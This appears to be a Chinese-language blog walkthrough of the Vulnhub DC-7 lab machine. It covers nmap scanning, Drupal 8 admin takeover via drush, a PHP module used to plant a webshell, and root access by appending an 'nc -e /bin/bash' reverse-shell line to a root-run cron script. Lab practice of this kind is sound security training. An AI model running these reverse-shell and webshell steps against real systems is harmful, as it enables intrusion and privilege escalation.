Vulnhub靶机DC系列-DC-7

Vulnhub靶机DC系列-DC-7

靶场名称:DC-7
靶场地址:https://www.vulnhub.com/entry/dc-7,356/
下载地址:

DC-7.zip (Size: 939 MB)
Download: http://www.five86.com/downloads/DC-7.zip
Download (Mirror): https://download.vulnhub.com/dc/DC-7.zip
Download (Torrent): https://download.vulnhub.com/dc/DC-7.zip.torrent (Magnet)

VMware->文件->打开->选中 .ova 文件,导入,会提示导入失败,点重试就完事了(双击.ova好像就直接导入了-_-)

打开DC靶机(网络适配器看一下是不是NAT模式,不然扫不出来)

kali攻击机网段:192.168.210.0/24
nmap 扫一下DC-7靶机的网段

namp -sn x.x.x.x/x

Vulnhub靶机DC系列-DC-7_第1张图片
靶机DC-7 IP:192.168.210.146
kali:192.168.210.137

nmap扫描一下靶机的端口信息、系统信息等等。

nmap -O -sV -p- 192.168.210.146

Vulnhub靶机DC系列-DC-7_第2张图片
22、80端口开放
访问页面,CMS:Drupal8
Vulnhub靶机DC系列-DC-7_第3张图片
dirb 扫描目录半天也没有什么有用信息,有一个robots.txt里面也没有什么有用信息。

Vulnhub靶机DC系列-DC-7_第4张图片看看描述
Vulnhub靶机DC系列-DC-7_第5张图片盒子里没有线索,从outside找线索,那就直接百度咯,百度什么呢

  • drupal8
  • @DC7USER

试试
GitHub里,有资源,看一下配置文件里有没有数据库账号密码
Vulnhub靶机DC系列-DC-7_第6张图片Vulnhub靶机DC系列-DC-7_第7张图片


Vulnhub靶机DC系列-DC-7_第8张图片Vulnhub靶机DC系列-DC-7_第9张图片ssh直接进去了
有9封邮件
Vulnhub靶机DC系列-DC-7_第10张图片由内容可以知道这是root用户发给dc7user用户的一封邮箱,并且会以root权限定时执行/opt/scripts/backups.sh脚本。
Vulnhub靶机DC系列-DC-7_第11张图片

cat /opt/scripts/backups.sh

Vulnhub靶机DC系列-DC-7_第12张图片#!/bin/bash 由于bachups.sh脚本执行的是root权限,所以我们现在只要在脚本里写入反弹shell命令就能得到root权限的shell了
而www-data用户即网站用户具有对该脚本写入的权限,所以我们现在要拿到www-data用户的反弹shell

drush命令是drupal系统中特定的管理工具。可以修改www-data用户admin密码

drush命令:
https://www.howtoing.com/a-beginner-s-guide-to-drush-the-drupal-shell

修改admin用户密码为admin

drush user-password admin --password="admin"

Vulnhub靶机DC系列-DC-7_第13张图片现在我们要拿网站的shell,看看能不能挂马

发现可以写入一个网页,但是网页类型没有PHP模式
Vulnhub靶机DC系列-DC-7_第14张图片
所以需要下载一个PHP代码的插件即可。
php插件下载
https://www.drupal.org/project/php
https://ftp.drupal.org/files/projects/php-8.x-1.1.zip
https://ftp.drupal.org/files/projects/php-8.x-1.1.tar.gz
Vulnhub靶机DC系列-DC-7_第15张图片Vulnhub靶机DC系列-DC-7_第16张图片安装出错,可以试试另一个.tar.gz.

Vulnhub靶机DC系列-DC-7_第17张图片写入一句话木马,蚁剑连接。或者直接反弹shell
Vulnhub靶机DC系列-DC-7_第18张图片连接成功,在蚁剑反弹Vulnhub靶机DC系列-DC-7_第19张图片
kali监听9999,python获得交互shell在这里插入图片描述

python -c "import pty; pty.spawn('/bin/bash')"

echo 'nc -e /bin/bash 192.168.210.137 8888' >> /opt/scripts/backups.sh

Vulnhub靶机DC系列-DC-7_第20张图片
反弹shell写入成功。等定时任务执行即可自动连接。
Vulnhub靶机DC系列-DC-7_第21张图片

靶机结束。

你可能感兴趣的:(DC,笔记,安全,linux,运维)